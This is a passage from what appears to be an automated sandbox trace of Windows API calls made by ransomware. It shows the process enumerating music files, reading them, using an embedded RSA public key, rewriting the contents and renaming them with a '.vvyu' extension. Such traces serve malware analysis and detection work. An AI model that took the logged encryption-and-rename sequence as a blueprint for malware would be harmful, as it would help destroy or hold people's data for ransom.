hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adea58 | out: hHeap=0x2c0000) returned 1 [0199.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.702] WriteFile (in: hFile=0x584, lpBuffer=0x2afb168*, nNumberOfBytesToWrite=0x7555, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2afb168*, lpNumberOfBytesWritten=0x2f9fb14*=0x7555, lpOverlapped=0x0) returned 1 [0199.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2afb168 | out: hHeap=0x2c0000) returned 1 [0199.702] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x755a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.703] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.703] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.704] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.704] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.704] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.704] CloseHandle (hObject=0x584) returned 1 [0199.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3aa000 [0199.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0199.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa000 | out: hHeap=0x2c0000) returned 1 [0199.707] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\i 1M.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\i 1m.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\i 1M.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\i 1m.wav.vvyu")) returned 1 [0199.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.708] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.711] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13d32bf0, ftCreationTime.dwHighDateTime=0x1d896f5, ftLastAccessTime.dwLowDateTime=0xeec37fc0, ftLastAccessTime.dwHighDateTime=0x1d89ad9, ftLastWriteTime.dwLowDateTime=0xeec37fc0, ftLastWriteTime.dwHighDateTime=0x1d89ad9, nFileSizeHigh=0x0, nFileSizeLow=0xd0ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xryUj16QF_9DxMTZ1QMq.m4a", cAlternateFileName="XRYUJ1~1.M4A")) returned 1 [0199.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.712] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.712] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\xryUj16QF_9DxMTZ1QMq.m4a") returned=".m4a" [0199.712] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\AZ2aRaMGzQB\\xryUj16QF_9DxMTZ1QMq.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\47m5sv0uqvnl\\az2aramgzqb\\xryuj16qf_9dxmtz1qmq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.712] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=53487) returned 1 [0199.712] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.716] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd0c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.716] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.718] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.719] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xd0ef, lpOverlapped=0x0) returned 1 [0199.720] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.720] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.720] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.720] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.721] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.721] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.721] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.721] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.721] GetLastError () returned 0x0 [0199.721] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.721] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.722] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.722] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.722] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0199.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0199.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0f0) returned 0x2afb168 [0199.723] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adea58 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2adeaa0 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0199.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b30 [0199.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.724] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0199.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6b18 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b30 | out: hHeap=0x2c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b78 | out: hHeap=0x2c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0199.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.728] GetCurrentThreadId () returned 0x5d8 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5f90 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.728] GetCurrentThreadId () returned 0x5d8 [0199.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b78 [0199.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b18 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b90 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b60 [0199.733] HeapFree (in: 